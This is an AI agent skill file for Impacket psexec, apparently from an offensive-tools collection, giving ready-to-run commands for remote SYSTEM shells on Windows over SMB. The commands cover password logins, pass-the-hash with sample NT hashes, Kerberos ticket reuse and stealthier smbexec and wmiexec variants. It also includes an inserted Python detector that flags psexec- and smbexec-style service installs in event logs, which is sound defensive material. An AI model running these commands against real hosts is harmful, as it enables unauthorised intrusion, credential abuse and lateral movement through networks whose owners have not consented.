offensive-tools/windows/psexec/SKILL.md
Auth/lab ref: Impacket psexec for remote SYSTEM-level shell execution on Windows hosts via SMB.
Install: `npx skillsauth add aeondave/malskill psexec` (works with Claude Code, Cursor, and Windsurf).
Remote SYSTEM shell via SMB — part of the impacket suite. Creates a service, uploads a remote shell binary to ADMIN$, and executes it.

```bash
# Password auth (target and password are placeholders)
impacket-psexec domain/user:pass@<target>
# Pass-the-hash: empty LM half, NT hash only
impacket-psexec domain/user@<target> -hashes :8846f7eaee8fb117ad06bdd830b7586c
# Local account
impacket-psexec WORKGROUP/administrator:pass@<target>
```

| Flag | Description |
|------|-------------|
| domain/user:pass@target | Standard auth string |
| -hashes <LM:NT> | Pass-the-hash (use :NT for NT only) |
| -no-pass | No password (for null sessions) |
| -k | Kerberos auth |
| -dc-ip <ip> | Domain controller IP |
| -port <n> | Custom SMB port |
| -service-name <n> | Custom service name (default random) |
| -remote-binary-name <n> | Custom remote binary name |
| -shell-type <type> | Shell type: cmd or powershell |
| -codec <enc> | Output encoding (default auto-detect) |

| Tool | Method | Notes |
|------|--------|-------|
| psexec.py | Service + ADMIN$ binary | SYSTEM shell; noisy (creates service and drops a binary) |
| smbexec.py | Service + cmd.exe | No binary drop; semi-interactive |
| wmiexec.py | WMI + cmd.exe | Semi-interactive; no service created |
| atexec.py | Task Scheduler | Single command; no interactive shell |
| dcomexec.py | DCOM | Multiple DCOM object options |
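
As an added defender-side example (not part of this skill or of impacket), the following Python flags the two service-install patterns the table above describes: a psexec-style binary dropped into ADMIN$ (which maps to C:\Windows) under a random name, and an smbexec-style service whose image path is the command interpreter itself. The log records, the field layout, and the letters-only name heuristic are constructed assumptions; a real query would read Event ID 7045 from the System log, and the psexec rule keys on default names, so `-service-name`/`-remote-binary-name` overrides will evade it.

```python
import re

# Constructed sample "Service installed" (System log, Event ID 7045) records,
# flattened to field=value pairs separated by tabs. Invented for this example.
SAMPLE_7045 = [
    "EventID=7045\tServiceName=Spooler\tImagePath=C:\\Windows\\System32\\spoolsv.exe",
    "EventID=7045\tServiceName=wXkQ\tImagePath=C:\\Windows\\HzKpLmQr.exe",
    "EventID=7045\tServiceName=SvcA\tImagePath=%COMSPEC% /Q /c echo whoami ^> "
    "\\\\127.0.0.1\\C$\\__output 2^>&1 > %TEMP%\\execute.bat & %COMSPEC% /Q /c %TEMP%\\execute.bat",
    "EventID=7045\tServiceName=BackupAgent\tImagePath=\"C:\\Program Files\\Vendor\\agent.exe\"",
]

# ADMIN$ is %SystemRoot%, so an uploaded service binary lands directly in C:\Windows.
ADMIN_SHARE_BINARY = re.compile(r'^"?[A-Za-z]:\\Windows\\([A-Za-z]{4,16})\.exe"?$', re.IGNORECASE)
# Service whose "binary" is cmd.exe itself: no file dropped, command passed inline.
CMD_SERVICE = re.compile(r'^"?(?:%COMSPEC%|(?:[^"\s]*\\)?cmd(?:\.exe)?)(?:\s|"|$)', re.IGNORECASE)
# Short letters-only name, matching the random defaults psexec generates (assumption).
RANDOM_NAME = re.compile(r'^[A-Za-z]{4,8}$')

def parse_7045(line):
    """Split a flattened 7045 record into a dict; None for any other event."""
    fields = dict(part.split("=", 1) for part in line.split("\t") if "=" in part)
    return fields if fields.get("EventID") == "7045" else None

def classify(event):
    """Return a verdict string for a parsed 7045 event, or None if it looks benign."""
    name, path = event.get("ServiceName", ""), event.get("ImagePath", "")
    if ADMIN_SHARE_BINARY.match(path) and RANDOM_NAME.match(name):
        return "psexec-style: random service running a binary dropped into ADMIN$"
    if CMD_SERVICE.match(path):
        return "smbexec-style: service runs cmd.exe directly, no binary on disk"
    return None

def scan(lines):
    """Return (service name, verdict) for every suspicious 7045 record."""
    hits = []
    for line in lines:
        event = parse_7045(line)
        if event is None:
            continue
        verdict = classify(event)
        if verdict:
            hits.append((event["ServiceName"], verdict))
    return hits

if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_7045):
        print(f"{name}: {verdict}")
```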

```bash
# Get SYSTEM shell with credentials (password and target are placeholders)
impacket-psexec corp.local/admin:<password>@<target>
# Pass-the-hash (no LM half needed for modern Windows)
impacket-psexec -hashes :f6f38b793db6a78dc379eee9e56b8c91 corp.local/admin@<target>
# PowerShell shell instead of cmd
impacket-psexec admin:<password>@<target> -shell-type powershell
# Execute a single command (use wmiexec for non-interactive runs)
impacket-wmiexec admin:<password>@<target> "net user"
# Stealthier: smbexec (no binary written to disk)
impacket-smbexec admin:<password>@<target>
# Kerberos auth with a CCACHE; target must be the host's DNS name, not an IP
export KRB5CCNAME=/tmp/admin.ccache
impacket-psexec -k -no-pass corp.local/<user>@<target-fqdn>
```

| File | When to load |
|------|--------------|
| references/impacket-suite.md | Full impacket tool reference, secretsdump, GetUserSPNs, ticketing attacks |